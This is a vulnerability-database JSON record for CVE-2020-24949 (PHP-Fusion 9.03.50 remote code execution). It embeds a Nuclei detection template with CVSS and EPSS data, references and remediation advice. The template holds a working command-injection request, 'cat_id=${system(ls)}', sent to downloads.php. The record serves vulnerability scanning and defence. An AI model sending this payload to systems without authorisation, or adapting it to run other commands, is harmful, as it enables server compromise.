{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-24949/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-24949/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-24949/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-24949/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-24949/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-24949"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-24949"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-24949.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2020-24949\n\ninfo:\n  name: PHP-Fusion 9.03.50 - Remote Code Execution\n  author: geeknik\n  severity: high\n  description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise.\n  remediation: |\n    Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion.\n  reference:\n    - https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt\n    - https://github.com/php-fusion/PHP-Fusion/issues/2312\n    - http://packetstormsecurity.com/files/162852/PHPFusion-9.03.50-Remote-Code-Execution.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-24949\n    - https://github.com/404notf0und/CVE-Flow\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2020-24949\n    cwe-id: CWE-77\n    epss-score: 0.67516\n    epss-percentile: 0.99278\n    cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: php-fusion\n    product: php-fusion\n  tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"infusion_db.php\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100f9983468afefb6a83b79162860cf6e92c0bedee230746d305037c9e853d5b4bc0221008ac955368f33b7dad25aa3cb35133e568db540080b51c3146057829341d7a3df:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-24949"
}